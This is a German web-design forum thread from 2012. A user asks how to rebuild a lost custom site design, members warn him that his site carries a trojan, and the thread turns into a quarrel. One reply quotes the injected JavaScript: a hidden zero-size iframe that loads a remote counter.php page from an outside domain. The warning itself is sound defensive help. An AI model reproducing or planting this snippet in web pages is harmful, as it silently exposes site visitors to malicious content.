Zurück   Web to Date - SIQUANDO Forum >

Web to Date - Data Becker
> Web to Date CCML Designs

Antwort
 
LinkBack Themen-Optionen Thema durchsuchen Ansicht
Alt 05.11.2012, 18:49   #1 (permalink)
Benutzer
 
Registriert seit: 12.02.2010
Ort: Hamburg
Beiträge: 50
Tosh befindet sich auf einem aufstrebenden Ast
Frage Eigenes Design Alpha gelöscht... und nu?

Hallo alle miteinander ;-)

Vor über 2 Jahren hat mir dieses Forum sehr geholfen meine HP
Thorsten Bendixen Gas-Heizungs - und Sanitärtechnik, Handwerksleistungen rund um Ihre Haustechnik aus Meisterhand

aus dem Design Alpha mit WTD 6.0 zurecht zu "basteln". Es war eine Heidenarbeit und vieles musste durch unendliches ausprobieren hergestellt werden. Aber Ende Gut alles Gut.

Nun musste ich das Betriebssystem neu aufsetzen und hatte natürlich nicht daran gedacht, meine eigenes Design zu sichern. Ich habe nur die Backups von WTD aktuell und separat gesichert. Also diese Daten sind da.

Jetzt zu meiner eigentlichen Frage: Einige Änderungen im Design gehen doch mit den neueren Versionen von WTD ganz einfach, wie z.B. das zentrieren der Webseite u.ä. Ist es also ggf. sinnvoll erst auf eine neuere Version zu upgraden und dann erst das Design Alpha anzupassen?

Ich hoffe auf viele Tipps

Gruß

Thorsten
__________________
Gruß

Thorsten

"Lächeln = Das Kleingeld des Glücks"
Tosh ist offline   Mit Zitat antworten
Alt 05.11.2012, 19:37   #2 (permalink)
Erfahrener Benutzer
 
Registriert seit: 28.11.2009
Ort: Cottbus/Spreewald
Beiträge: 3.499
Paulemann wird schon bald berühmt werden
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Leider wurden viele Designs auch unter den neueren Versionen nicht auf die Höhe der Zeit gebracht. Alpha macht da keine Ausnahme in der Darstellung.
Hier siehst Du ein angepasstes Alpha unter W2d8. Ansonsten wäre es, wie Du es gewohnt bist.
__________________
Never change a running system - wenn etwas läuft, soll man nichts ändern.

Design-Anpassungen und mehr....
----------------
Support zu meinen Anpassungen....
Paulemann ist offline   Mit Zitat antworten
Alt 09.11.2012, 00:05   #3 (permalink)
Erfahrener Benutzer
 
Benutzerbild von Sven aus Berlin
 
Registriert seit: 07.06.2009
Ort: Berlin
Beiträge: 479
Sven aus Berlin befindet sich auf einem aufstrebenden Ast
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Hallo Thorsten,

in übrigen befindet sich ein Trojaner in dein /assets-Ordner. Genauer in der m.js.
Siehe Anhänge von eben.

Und
Sven aus Berlin ist offline   Mit Zitat antworten
Alt 09.11.2012, 18:20   #4 (permalink)
Benutzer
 
Registriert seit: 12.02.2010
Ort: Hamburg
Beiträge: 50
Tosh befindet sich auf einem aufstrebenden Ast
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Hallo Sven, das ist ja ein Ding mit dem Trojaner. Wo kann der denn herkommen? Mit einem neuen Aufspielen/Hochladen der Homepage sollte dass dann aber erledigt sein.
Eine Frage hätte ich aber dann doch noch, wieso scannst Du meine Seite nach Viren? Hatte das einen besonderen Grund?
__________________
Gruß

Thorsten

"Lächeln = Das Kleingeld des Glücks"
Tosh ist offline   Mit Zitat antworten
Alt 09.11.2012, 22:47   #5 (permalink)
Erfahrener Benutzer
 
Benutzerbild von Sven aus Berlin
 
Registriert seit: 07.06.2009
Ort: Berlin
Beiträge: 479
Sven aus Berlin befindet sich auf einem aufstrebenden Ast
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Richtig ontourrh,

mein Webscanner schlägt von alleine an!

Thorsten, ich scanne nicht deine oder sonst irgend jemandes Website nach Viren, sondern das macht der webvirenwächter automatisch!
An Hand der Bilder kannst du ja sehen, dass mein Webwächter den Zugriff auf besagte Datei stoppt und ein Zugriff darauf nicht zulässt! Erneut habe ich deine Seite danach nicht mehr besucht und werde ich auch nicht, da sie jetzt in meiner (bzw. des Webwächters-) Blacklist steht und ein erneuter Zugriff nicht gestattet wird vom Wächter!

Nichts für ungut!
Sven aus Berlin ist offline   Mit Zitat antworten
Alt 10.11.2012, 11:59   #6 (permalink)
Benutzer
 
Registriert seit: 12.02.2010
Ort: Hamburg
Beiträge: 50
Tosh befindet sich auf einem aufstrebenden Ast
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Zitat:
Zitat von ontourrh Beitrag anzeigen
da macht auch keiner einen scan von deiner WS. es springt einfach unser wächter an !

selbst schuld ?
oder wer hat dir das in deine "menu.js" geschuggelt:
Code:
/*c3284d*/
document.write('<iframe src="http://rcz.nu/counter.php" border="0" width="0" height="0"></iframe>');
/*/c3284d*/
EDIT: denke schon, daß du es selber warst ! denn das steht schließlich bei dir im head ebenfalls drin.
Was war ich selber und woran bin ich selbst schuld? Gehts noch ein bischen genauer, oder was soll der Beitrag? Wenn Du mir helfen willst, muss schon etwas mehr kommen, als "nur" irgenwas in den Raum stellen.

Zitat:
Zitat von Sven aus Berlin Beitrag anzeigen
Richtig ontourrh,

mein Webscanner schlägt von alleine an!

Thorsten, ich scanne nicht deine oder sonst irgend jemandes Website nach Viren, sondern das macht der webvirenwächter automatisch!
An Hand der Bilder kannst du ja sehen, dass mein Webwächter den Zugriff auf besagte Datei stoppt und ein Zugriff darauf nicht zulässt! Erneut habe ich deine Seite danach nicht mehr besucht und werde ich auch nicht, da sie jetzt in meiner (bzw. des Webwächters-) Blacklist steht und ein erneuter Zugriff nicht gestattet wird vom Wächter!

Nichts für ungut!
Kein Problem Sven und ich habe begriffen das dieses Forum nur noch dazu dient, Webdienste anzupreisen.
Nichts für ungut!
__________________
Gruß

Thorsten

"Lächeln = Das Kleingeld des Glücks"

Geändert von Tosh (10.11.2012 um 12:01 Uhr)
Tosh ist offline   Mit Zitat antworten
Alt 11.11.2012, 01:43   #7 (permalink)
Erfahrener Benutzer
 
Benutzerbild von Sven aus Berlin
 
Registriert seit: 07.06.2009
Ort: Berlin
Beiträge: 479
Sven aus Berlin befindet sich auf einem aufstrebenden Ast
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Mh, so ganz verstehe ich jetzt zwar nicht die Aussage von dir Thorsten, aber lassen wir das!
Wollte dir lediglich den Hinweis geben, dass halt ein Trojaner auf deiner Seite ist. Mehr nicht. Und Ontourrh hat dir ja auch aufgezeigt wo sich der Trojaner genau befindet! Nicht mehr nicht weniger .....
Sven aus Berlin ist offline   Mit Zitat antworten
Alt 11.11.2012, 12:51   #8 (permalink)
Erfahrener Benutzer
 
Benutzerbild von w2dfan
 
Registriert seit: 11.11.2009
Ort: Niederlande
Beiträge: 2.445
w2dfan befindet sich auf einem aufstrebenden Ast
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Ohne Worte
__________________
VG
W2D Fan

Hilfe ist NICHT selbstverständlich, deswegen wäre ein einfaches "Danke" nachdem dir geholfen wurde ganz normal und höflich!
w2dfan ist offline   Mit Zitat antworten
Alt 11.11.2012, 15:39   #9 (permalink)
Administrator
 
Benutzerbild von voodoo36
 
Registriert seit: 17.04.2009
Ort: Regensburg
Beiträge: 4.601
voodoo36 befindet sich auf einem aufstrebenden Ast
Ausrufezeichen AW: Eigenes Design Alpha gelöscht... und nu?

Hallo Thorsten, ich kenne deine Seite noch aus frühreren 6.0 Tagen und da hatte ich dir geholfen ... aber du musst hier niemanden mit PN zurechtweisen...
Man wollte dir nur helfen... wenn du dein Design nicht gesichert hattest, dann ist es natürlich weg, aber so schlimm wird das ja nicht sein, bei der Seite!
Vielleicht nimmst du dir ein anderes Design ohne jegliche Änderungen...
dann sieht es auch besser aus!
__________________
Grüße aus Bayern
voodoo36 ist offline   Mit Zitat antworten
Alt 11.11.2012, 19:09   #10 (permalink)
Benutzer
 
Registriert seit: 12.02.2010
Ort: Hamburg
Beiträge: 50
Tosh befindet sich auf einem aufstrebenden Ast
Standard AW: Eigenes Design Alpha gelöscht... und nu?

Hallo voodoo, immer noch eingeschnappt weil ich deinen Entwurf damals nicht KAUFEN wollte? Naja, jeder hat ein Recht auf deine Meinung/Geschmack und in anderen Beiträgen läßt sich ja ganz gut nachlesen, wie Ihr es mit diesem Forum und den darin gestellten Fragen teilweise so haltet.

Wer behauptet ich hätte mit Vorsatz einen Trojaner in meine eigene HP eingebaut, darf sich über eine PN von mir nicht beschweren! Aber macht nur weiter so, für mich ist das Thema mit euch durch! Und wie ich sehe, bin ich ja nicht der einzige
Tosh ist offline   Mit Zitat antworten
Antwort

Lesezeichen

Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Design Alpha zentrieren blue Web to Date CCML Designs 22 19.08.2011 22:47
Kann mein eigenes Design nicht auswählen! oeko-energie Web to Date 6.0 5 21.07.2010 23:53
Design Persephone - eigenes Logo eltonno Web to Date 6.0 10 29.04.2010 00:09
Eigenes Design mindofmush Web to Date 6.0 0 18.11.2009 08:17
Eigenes Hintergrundbild beim Design WIDE elsdorf Web to Date 6.0 0 31.07.2009 09:19


absatz pdf datei plugins

Alle Zeitangaben in WEZ +2. Es ist jetzt 16:46 Uhr.
Powered by vBulletin® Version 3.8.2 (Deutsch) - Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.0 PL2
Seite generiert in 0,07375 Sekunden mit 19 Datenbankabfragen

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16